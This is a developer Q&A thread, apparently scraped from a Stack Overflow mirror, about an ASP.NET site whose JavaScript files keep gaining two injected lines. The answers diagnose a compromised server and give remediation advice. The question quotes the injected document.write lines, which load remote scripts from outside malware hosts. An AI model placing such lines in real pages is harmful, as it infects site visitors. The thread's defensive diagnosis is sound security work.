JavaScript Code injected into my website pages_问答_开发者

I need to know if there is any way of writing additional code to JavaScript files already deployed on the server.

I am facing a problem with a开发者_开发知识库n ASP.NET 2.0 website and it is related to the JavaScript files which I have on some of the pages. The problem is that when I upload the JavaScript files along with other files it works fine, but after sometime (one or two days) the JavaScript files get changed and two additional lines are added at the bottom of each of them. Those two lines are this:

document.write('<script src=http://kingsoftus.com/App_Code/tsx2.php ><\/script>');
document.write('<script src=http://eco-battery.co.uk/images/battguide.php ><\/script>');

This is causing my aspx pages to load something from these unknown urls. This thing causes errors and the aspx page does not get loaded or gets loaded with an error. I suspect there is something wrong on the server, but I need to know if there is any possibility that someone (virus or hacker) could just add these two lines to any JavaScript file on the server.

Your server is compromised. The added links point to malware-flagged sites. The safest approach is to wipe the server and restore from backup. If you don't own server maintenance, contact those who do as soon as you can, and inform them of the infection. Take the server down to avoid infecting those who visit your site.

As to what caused the infection, some research might bring up specifics for the signatures you're seeing. It could be anything from old, unpatched libraries to XSS vulnerabilities in your code to a careless employee with an infected flash drive.

EDIT: you say in comments that you don't manage the server. While the provider is evaluating the infection, evaluate your code for possible vulnerabilities. Here's an MSDN article to start with (How To: Prevent Cross-Site Scripting in ASP.NET). An older SO question (What should a developer know before building a public web site?) has some great answers covering security aspects.

Saqib, another poster pointed out that your server his compromised. He's right. He's somehow able to inject JavaScript into your pages.

There are many possibilities:

Do you have anywhere where a user can insert text (a textbox, a dropdownlist, anything?) It doesn't even have to allow them to insert text, since they can intercept the request and POST from somewhere other than the form).
Do you properly encode everything that is sent to your database?
Do you suffer from SQL injection issues?
Have you changed your password recently?
Do you use FTP (and not SFTP) for transferring files to your server?

If you answered yes to any of these questions, that's a potential hole. No, the problem is probably not with ASP.NET or IIS; it's probably a hole in your code.

There's a million ways to screw up security. Someone has gotten access to ftp? Server admin screwing with you? Insecure upload/download scripts, publicly writable directory? Some crappy cronjob that indiscriminately mauls files? I have no idea. Do you run the server?

Back everything up, change all your passwords, check that your up/download scripts are secure, check permissions on everything -- or maybe move to another server/restore if it's yours. Actually just do that last thing, and then check the rest, because this is a "code red" kind of thing.

EDIT: Now with less linux

I agree with the existing posts about the importance of guarding aganist XSS and SQL injection.

However, my first guess in this case would be an FTP account compromise. There's a lot of this about at the moment. A trojan infects a client machine and steals the FTP passwords either stored in saved accounts or live at login-time. An automated tool then eventually gets around to using the stolen account to log into your server and change the files to include links to malware exploits (often installing the same client-side password-stealing trojan).

So as well as ensuring the server and your application code are secure, you need to make sure any computers you use to log into the FTP account are clean. Your machine is not clean just because one anti-virus tool thinks so: these days AV is absolutely hopeless at detecting the enormous range of live malware, and even worse at deleting it. Take multiple AV checker opinions, and if you have ever had an infection on the machine before consider it still infected and reinstall the OS, because chances are the AV hasn't cleaned it completely.

In the longer term, lock down clients you use for development (uninstall plugins, increase security settings, ensure all net-facing software is up-to-date) and use SFTP to upload files to your server. Nobody should be using FTP in 2009.